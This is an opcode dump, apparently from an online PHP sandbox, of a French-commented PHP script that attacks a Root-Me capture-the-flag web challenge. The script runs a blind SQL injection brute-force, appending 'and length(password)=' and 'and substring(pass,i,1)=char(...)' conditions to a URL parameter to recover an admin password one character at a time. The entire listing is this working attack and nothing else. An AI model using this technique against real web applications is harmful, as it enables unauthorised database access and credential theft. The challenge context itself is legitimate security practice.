Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 43
Branch analysis from position: 43
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 9
Branch analysis from position: 45
2 jumps found. (Code = 43) Position 1 = 47, Position 2 = 48
Branch analysis from position: 47
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 48
1 jumps found. (Code = 42) Position 1 = 103
Branch analysis from position: 103
2 jumps found. (Code = 44) Position 1 = 105, Position 2 = 54
Branch analysis from position: 105
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 54
2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 58
Branch analysis from position: 57
1 jumps found. (Code = 42) Position 1 = 78
Branch analysis from position: 78
2 jumps found. (Code = 44) Position 1 = 83, Position 2 = 74
Branch analysis from position: 83
2 jumps found. (Code = 43) Position 1 = 88, Position 2 = 102
Branch analysis from position: 88
2 jumps found. (Code = 44) Position 1 = 105, Position 2 = 54
Branch analysis from position: 105
Branch analysis from position: 54
Branch analysis from position: 102
Branch analysis from position: 74
2 jumps found. (Code = 44) Position 1 = 83, Position 2 = 74
Branch analysis from position: 83
Branch analysis from position: 74
Branch analysis from position: 58
Branch analysis from position: 9
1 jumps found. (Code = 42) Position 1 = 26
Branch analysis from position: 26
2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 22
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 36, Position 2 = 42
Branch analysis from position: 36
1 jumps found. (Code = 42) Position 1 = 45
Branch analysis from position: 45
Branch analysis from position: 42
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 9
Branch analysis from position: 45
Branch analysis from position: 9
Branch analysis from position: 22
2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 22
Branch analysis from position: 31
Branch analysis from position: 22
filename: /in/UnOHb
function name: (null)
number of ops: 110
compiled vars: !0 = $url, !1 = $max, !2 = $longueur, !3 = $i, !4 = $fp, !5 = $buf, !6 = $pass, !7 = $borne_inf, !8 = $borne_sup, !9 = $code, !10 = $ligne
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
3 0 E > INIT_FCALL 'set_time_limit'
1 SEND_VAL 0
2 DO_ICALL
5 3 ASSIGN !0, 'http%3A%2F%2Fchallenge01.root-me.org%2Fweb-serveur%2Fch10%3Fid%3D1'
7 4 ASSIGN !1, 40
8 5 ASSIGN !2, 0
9 6 ECHO 'Bruteforce+de+la+longueur+du+mot+de+passe+en+cours...%3Cbr+%2F%3E'
10 7 ASSIGN !3, 1
8 > JMP ->43
12 9 > INIT_FCALL 'fopen'
10 INIT_FCALL 'urlencode'
11 NOP
12 FAST_CONCAT ~16 '+and+length%28password%29%3D', !3
13 SEND_VAL ~16
14 DO_ICALL $17
15 CONCAT ~18 !0, $17
16 SEND_VAL ~18
17 SEND_VAL 'r'
18 DO_ICALL $19
19 ASSIGN !4, $19
13 20 ASSIGN !5, ''
15 21 > JMP ->26
17 22 > INIT_FCALL 'fgets'
23 SEND_VAR !4
24 DO_ICALL $22
25 ASSIGN_OP 8 !5, $22
15 26 > INIT_FCALL 'feof'
27 SEND_VAR !4
28 DO_ICALL $24
29 BOOL_NOT ~25 $24
30 > JMPNZ ~25, ->22
20 31 > INIT_FCALL 'preg_match'
32 SEND_VAL '%2Fadmin%2F'
33 SEND_VAR !5
34 DO_ICALL $26
35 > JMPZ $26, ->42
21 36 > ROPE_INIT 3 ~28 'La+longueur+du+pass+est+%3A+'
37 ROPE_ADD 1 ~28 ~28, !3
38 ROPE_END 2 ~27 ~28, '+%3Cbr+%2F%3E'
39 ECHO ~27
22 40 ASSIGN !2, !3
23 41 > JMP ->45
10 42 > PRE_INC !3
43 > IS_SMALLER !3, !1
44 > JMPNZ ~32, ->9
26 45 > IS_EQUAL !2, 0
46 > JMPZ ~33, ->48
47 > > EXIT 'Longueur+non+trouv%C3%A9e'
28 48 > ASSIGN !6, ''
29 49 ASSIGN !3, 1
31 50 ASSIGN !7, 48
32 51 ASSIGN !8, 123
34 52 ASSIGN !9, !7
35 53 > JMP ->103
36 54 > ADD ~39 !8, 1
55 IS_EQUAL !9, ~39
56 > JMPZ ~40, ->58
57 > ASSIGN !9, !7
38 58 > INIT_FCALL 'fopen'
59 INIT_FCALL 'urlencode'
60 ROPE_INIT 5 ~43 '+and+substring%28pass%2C'
61 ROPE_ADD 1 ~43 ~43, !3
62 ROPE_ADD 2 ~43 ~43, '%2C1%29%3Dchar%28'
63 ROPE_ADD 3 ~43 ~43, !9
64 ROPE_END 4 ~42 ~43, '%29'
65 SEND_VAL ~42
66 DO_ICALL $46
67 CONCAT ~47 !0, $46
68 SEND_VAL ~47
69 SEND_VAL 'r'
70 DO_ICALL $48
71 ASSIGN !4, $48
39 72 ASSIGN !10, ''
41 73 > JMP ->78
43 74 > INIT_FCALL 'fgets'
75 SEND_VAR !4
76 DO_ICALL $51
77 ASSIGN_OP 8 !10, $51
41 78 > INIT_FCALL 'feof'
79 SEND_VAR !4
80 DO_ICALL $53
81 BOOL_NOT ~54 $53
82 > JMPNZ ~54, ->74
45 83 > INIT_FCALL 'preg_match'
84 SEND_VAL '%2Fadmin%2F'
85 SEND_VAR !10
86 DO_ICALL $55
87 > JMPZ $55, ->102
47 88 > NOP
89 FAST_CONCAT ~56 !3, '+eme+lettre+trouv%C3%A9e+%3A+'
90 INIT_FCALL 'chr'
91 SEND_VAR !9
92 DO_ICALL $57
93 CONCAT ~58 ~56, $57
94 CONCAT ~59 ~58, '+%3Cbr+%2F%3E'
95 ECHO ~59
48 96 INIT_FCALL 'chr'
97 SEND_VAR !9
98 DO_ICALL $60
99 ASSIGN_OP 8 !6, $60
50 100 PRE_INC !3
51 101 ASSIGN !9, !7
53 102 > PRE_INC !9
35 103 > IS_SMALLER_OR_EQUAL !3, !2
104 > JMPNZ ~65, ->54
55 105 > ROPE_INIT 3 ~67 'Pass+final+%3A+'
106 ROPE_ADD 1 ~67 ~67, !6
107 ROPE_END 2 ~66 ~67, '+%3Cbr+%2F%3E'
108 ECHO ~66
56 109 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0